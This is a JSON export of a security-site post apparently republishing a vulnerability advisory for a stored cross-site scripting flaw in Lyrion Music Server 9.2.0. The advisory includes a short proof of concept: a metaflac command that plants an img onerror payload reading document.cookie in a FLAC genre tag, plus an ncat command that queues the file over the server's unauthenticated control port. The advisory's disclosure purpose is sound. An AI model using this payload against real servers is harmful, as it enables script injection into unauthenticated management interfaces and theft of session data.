{"id":60316,"date":"2026-06-05T14:47:57","date_gmt":"2026-06-05T14:47:57","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=60316"},"modified":"2026-06-05T14:47:57","modified_gmt":"2026-06-05T14:47:57","slug":"lyrion-music-server-920-metadata-stored-xss","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=60316","title":{"rendered":"Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-05T18:50:34&#8243;,&#8221;description&#8221;:&#8221;Summary Lyrion Music Server formerly Logitech Media Server, and often abbreviated as \\&#8221;LMS\\&#8221; is open-source software which can control and serve stream music to a wide range of physical and virtual audio players called Squeezeboxes. Lyrion Music Server&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-06-05T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-06-05T00:00:00&#8243;,&#8221;type&#8221;:&#8221;zeroscience&#8221;,&#8221;title&#8221;:&#8221;Lyrion Music Server 9.2.0 (metadata) Stored XSS&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;ZSL-2026-5990&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-50232&#8243;],&#8221;sourceData&#8221;:&#8221;\\u003chtml\\u003e\\u003cbody\\u003e\\u003cp\\u003eLyrion Music Server 9.2.0 (metadata) Stored XSS\\n\\n\\nVendor: LMS Community\\nProduct web page: https:\/\/www.lyrion.org\\nAffected version 9.2.0\\n\\nSummary: Lyrion Music Server (formerly Logitech Media Server, and\\noften abbreviated as \\&#8221;LMS\\&#8221; ) is open-source software which can control\\nand serve (stream) music to a wide range of physical and virtual audio\\nplayers called Squeezeboxes. Lyrion Music Server can stream your local\\nmusic collection, internet radio stations, and content from many streaming\\nservices (with and without subscriptions).\\n\\nDesc: Lyrion Music Server stores media file metadata tags (such as GENRE,\\nARTIST, and ALBUM) exactly as written in the file and later renders them\\nin its web interface without HTML-encoding, resulting in stored cross-site\\nscripting. An attacker who gets a file with a malicious tag into the victim&#8217;s\\nlibrary has their payload saved during the next library scan and executed\\nautomatically whenever a user views that track&#8217;s information or plays the\\nfile in the web UI. Because LMS is unauthenticated by default, the injected\\nscript runs with full access to the management interface, allowing admin\\ncommands, settings disclosure, and further exploitation.\\n\\nTested on: Windows 10 (64-bit) &#8211; EN\\n           Lyrion Music Server (9.2.0 &#8211; 1779973211)\\n           Perl\/5.32.1\\n           SQLite\\n\\n\\nVulnerability discovered by Gjoko &#8216;LiquidWorm&#8217; Krstic\\n                            @zeroscience\\n\\n\\nAdvisory ID: ZSL-2026-5990\\nAdvisory URL: https:\/\/www.zeroscience.mk\/#\/advisories\/ZSL-2026-5990\\nCVE ID: CVE-2026-50232\\nCVE URL: https:\/\/www.cve.org\/CVERecord?id=CVE-2026-50232\\n\\n\\n27.05.2026\\n\\n&#8211;\\n\\n\\n$ metaflac &#8211;set-tag=GENRE=\\&#8221;\\u003cimg onerror=\\&#8221;alert(document.cookie)\\&#8221; src=\\&#8221;1\\&#8221;\/\\u003e\\&#8221; evil.flac\\n$ metaflac &#8211;list evil.flac\\nMETADATA block #0\\n  type: 0 (STREAMINFO)\\n  is last: false\\n  length: 34\\n  minimum blocksize: 4608 samples\\n  maximum blocksize: 4608 samples\\n  minimum framesize: 2305 bytes\\n  maximum framesize: 14124 bytes\\n  sample_rate: 44100 Hz\\n  channels: 2\\n  bits-per-sample: 16\\n  total samples: 4664587\\n  MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d\\nMETADATA block #1\\n  type: 4 (VORBIS_COMMENT)\\n  is last: false\\n  length: 98\\n  vendor string: Lavf57.83.100\\n  comments: 2\\n    comment[0]: encoder=Lavf57.83.100\\n    comment[1]: GENRE=\\u003cimg onerror=\\&#8221;alert(document.cookie)\\&#8221; src=\\&#8221;1\\&#8221;\/\\u003e\\nMETADATA block #2\\n  type: 1 (PADDING)\\n  is last: true\\n  length: 8140\\n\\n$ ncat localhost 9090\\nplaylist add file:\/\/\/music\/evil.flac\\n\\u003c\/p\\u003e\\u003c\/body\\u003e\\u003c\/html\\u003e&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/www.zeroscience.mk\/codes\/lyrion_xss2.txt&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.2,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:L\/I:L\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.zeroscience.mk\/advisories\/ZSL-2026-5990.html&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-05T18:50:34&#8243;,&#8221;description&#8221;:&#8221;Summary Lyrion Music Server formerly Logitech Media Server, and often abbreviated as \\&#8221;LMS\\&#8221; is open-source software which can control and serve stream music to a&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,7,11,5,107],"class_list":["post-60316","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability","tag-zeroscience"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=60316\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-06-05T18:50:34&#8243;,&#8221;description&#8221;:&#8221;Summary Lyrion Music Server formerly Logitech Media Server, and often abbreviated as &#8221;LMS&#8221; is open-source software which can control and serve stream music to a...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=60316\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-05T14:47:57+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60316#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60316\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990\",\"datePublished\":\"2026-06-05T14:47:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60316\"},\"wordCount\":565,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.2\",\"exploit\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\",\"zeroscience\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=60316#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60316\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60316\",\"name\":\"Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-05T14:47:57+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60316#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=60316\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60316#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=60316","og_locale":"en_US","og_type":"article","og_title":"Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-06-05T18:50:34&#8243;,&#8221;description&#8221;:&#8221;Summary Lyrion Music Server formerly Logitech Media Server, and often abbreviated as &#8221;LMS&#8221; is open-source software which can control and serve stream music to a...","og_url":"https:\/\/zero.redgem.net\/?p=60316","og_site_name":"zero redgem","article_published_time":"2026-06-05T14:47:57+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=60316#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=60316"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990","datePublished":"2026-06-05T14:47:57+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=60316"},"wordCount":565,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.2","exploit","HIGH","news","Security","tapic","Vulnerability","zeroscience"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=60316#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=60316","url":"https:\/\/zero.redgem.net\/?p=60316","name":"Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-05T14:47:57+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=60316#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=60316"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=60316#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Lyrion Music Server 9.2.0 (metadata) Stored XSS_ZSL-2026-5990"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/60316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=60316"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/60316\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=60316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=60316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=60316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}